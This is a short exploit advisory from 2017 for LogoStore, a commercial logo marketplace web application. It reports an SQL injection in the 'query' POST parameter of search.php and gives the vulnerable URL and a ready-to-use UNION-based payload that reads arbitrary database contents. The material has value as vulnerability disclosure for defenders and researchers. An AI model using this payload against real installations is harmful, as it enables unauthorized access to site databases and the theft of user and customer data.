LogoStore SQL Injection
Posted on 02 February 2017
Exploit Title: LogoStore - SQL Injection Date: 27.01.2017 Software Link: https://codecanyon.net/item/logostore-buy-and-sell-logos-online/19379630 Exploit Author: Kaan KAMIS Contact: iletisim[at]k2an[dot]com Website: http://k2an.com Category: Web Application Exploits Overview LogoStore is a web application that allows you to buy and sell logos online. Manage logos within your account, check others logos and sell your own! Type of vulnerability: An SQL Injection vulnerability in LogoStore allows attackers to read arbitrary data from the database. Vulnerable URL : http://locahost/LogoStore/search.php Mehod : POST Parameter : query Simple Payload: Type: UNION query Payload: query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search=